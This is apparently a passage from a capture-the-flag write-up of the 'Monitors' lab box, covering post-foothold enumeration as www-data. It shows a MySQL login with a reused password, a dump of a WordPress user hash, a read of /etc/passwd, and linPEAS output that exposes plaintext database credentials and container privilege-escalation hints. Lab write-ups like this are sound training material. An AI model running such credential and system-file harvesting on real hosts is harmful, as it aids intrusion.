6. Box enumeration as www-data
www-data@monitors:/usr/share/cacti$ mysql -u wpadmin -p
Enter password: BestAdministrator@2020!
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0.00 sec)
mysql> select user_login,user_pass, user_email from wp_users;
+------------+------------------------------------+-------------------+
| user_login | user_pass | user_email |
+------------+------------------------------------+-------------------+
| admin | $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 | admin@monitor.htb |
+------------+------------------------------------+-------------------+
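# The admin password is already known, so there is no need to crack this hash
# (the $P$ prefix marks it as a WordPress phpass portable hash).
# Checking the folder names under /var/www; this took many attempts.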
www-data@monitors:/usr/share/cacti$ cd /var/www
www-data@monitors:/var/www$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Nov 10 2020 .
drwxr-xr-x 15 root root 4096 Nov 10 2020 ..
drwxr-xr-x 5 www-data www-data 4096 Apr 21 20:19 wordpress
www-data@monitors:/var/www/wordpress$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Had issues transferring files: neither wget nor curl was available on the box, so I used a `__curl` bash function instead.
PEAS output (selected sections)
# processes
root 1343 0.0 1.1 978804 48124 ? Ssl 19:07 0:00 /usr/bin/containerd
root 2113 0.0 0.1 110228 5660 ? Sl 19:07 0:00 _ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/d76094c5f30c08c24b23d78c5895d61ea5262ce4095f76efa04031a2502c3be5 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 2138 0.1 2.0 3410072 83344 ? Ssl 19:07 0:05 _ /usr/local/openjdk-8/bin/java -Dorg.gradle.appname=gradlew -classpath /usr/src/apache-ofbiz-17.12.01/gradle/wrapper/gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain --offline ofbiz
root 1660 0.0 2.0 1344420 82372 ? Ssl 19:07 0:02 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
╣ Interfaces
br-968a1c1855aa: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:c5:ff:fb:68 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet6 fe80::42:c1ff:fe0b:d224 prefixlen 64 scopeid 0x20<link>
ether 02:42:c1:0b:d2:24 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5 bytes 446 (446.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth67dfbca: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::b401:24ff:fe71:571a prefixlen 64 scopeid 0x20<link>
ether b6:01:24:71:57:1a txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21 bytes 1662 (1.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╣ Active Ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN -
╣ Users with console
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
root:x:0:0:root:/root:/bin/bash
╣ PHP exec extensions
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-enabled/cacti-admin.monitors.htb.conf
/etc/apache2/sites-enabled/monitors.htb.conf
╣ Analyzing Wordpress Files (limit 70)
-rwxr-xr-x 1 www-data www-data 3117 Oct 15 2020 /var/www/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 998 998 361 Nov 11 2020 /srv/gitlab/data/.gitconfig
╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"
╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it
-rw-r--r-- 1 root root 5140 Nov 10 2020 /usr/share/cacti/cacti/include/config.php
-rw-r--r-- 1 www-data www-data 5144 May 3 2020 /usr/share/cacti/cacti/include/config.php.dist
$database_type = 'mysql';
$database_default = 'cacti';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port = '3306';
$database_type = 'mysql';
$database_default = 'cacti';
$database_username = 'cacti';
$database_password = 'cactipass';
$database_port = '3306';